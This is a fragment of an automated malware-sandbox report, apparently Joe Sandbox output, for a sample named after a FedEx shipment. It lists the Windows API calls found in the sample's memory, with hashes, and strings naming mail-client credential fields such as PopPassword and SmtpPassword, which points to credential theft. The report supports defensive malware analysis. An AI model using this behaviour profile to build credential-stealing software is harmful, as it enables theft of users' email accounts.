                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                  APIs
                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: send
                  • String ID:
                  • API String ID: 2809346765-0
                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                  APIs
                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileMove
                  • String ID:
                  • API String ID: 3562171763-0
                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                  APIs
                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                  APIs
                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                  APIs
                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                  APIs
                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                  APIs
                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                  APIs
                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                  APIs
                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID:
                  • API String ID: 1174141254-0
                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                  APIs
                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: closesocket
                  • String ID:
                  • API String ID: 2781271927-0
                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                  APIs
                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                  APIs
                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                  APIs
                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                  • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                  • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                  • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                  APIs
                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040438F
                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                  • VariantInit.OLEAUT32(?), ref: 004043C4
                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                  • VariantInit.OLEAUT32(?), ref: 00404414
                  • SysAllocString.OLEAUT32(?), ref: 00404419
                  • VariantInit.OLEAUT32(?), ref: 00404431
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                  • String ID:
                  • API String ID: 1312198159-0
                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 0-2111798378
                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64